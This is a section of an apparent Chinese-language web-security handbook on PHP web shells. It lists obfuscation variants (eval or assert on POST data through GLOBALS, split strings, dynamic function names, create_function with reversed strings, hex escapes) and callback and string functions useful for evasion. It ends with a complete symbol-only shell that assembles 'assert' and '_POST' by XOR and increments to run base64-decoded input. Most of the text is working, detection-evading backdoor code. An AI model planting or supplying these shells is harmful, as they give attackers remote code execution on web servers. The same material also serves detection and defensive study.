5.1.8. WebShell¶
5.1.8.1. 常见变形¶
- GLOBALS
eval($GLOBALS['_POST']['op']);
$_FILEeval($_FILE['name']);
- 拆分
assert(${"_PO"."ST"} ['sz']);
- 动态函数执行
$k="ass"."ert"; $k(${"_PO"."ST"} ['sz']);
- create_function
$function = create_function('$code',strrev('lave').'('.strrev('TEG_$').'["code"]);');$function();
preg_replace
rot13
base64
- 进制转化
"\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145"
- 利用文件名
__FILE__
5.1.8.2. 字符串变形函数¶
ucwords
ucfirst
trim
substr_replace
substr
strtr
strtoupper
strtolower
strtok
str_rot13
5.1.8.3. 回调函数¶
call_user_func_array
call_user_func
array_filter
array_walk
array_map
registregister_shutdown_function
register_tick_function
filter_var
filter_var_array
uasort
uksort
array_reduce
array_walk
array_walk_recursive
5.1.8.4. 特殊字符Shell¶
PHP的字符串可以在进行异或、自增运算的时候,会直接进行运算,故可以使用特殊字符来构成Shell。
@$_++;
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
@${$__}[!$_](${$__}[$_]);
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
$_=$$____;
$___(base64_decode($_[_]));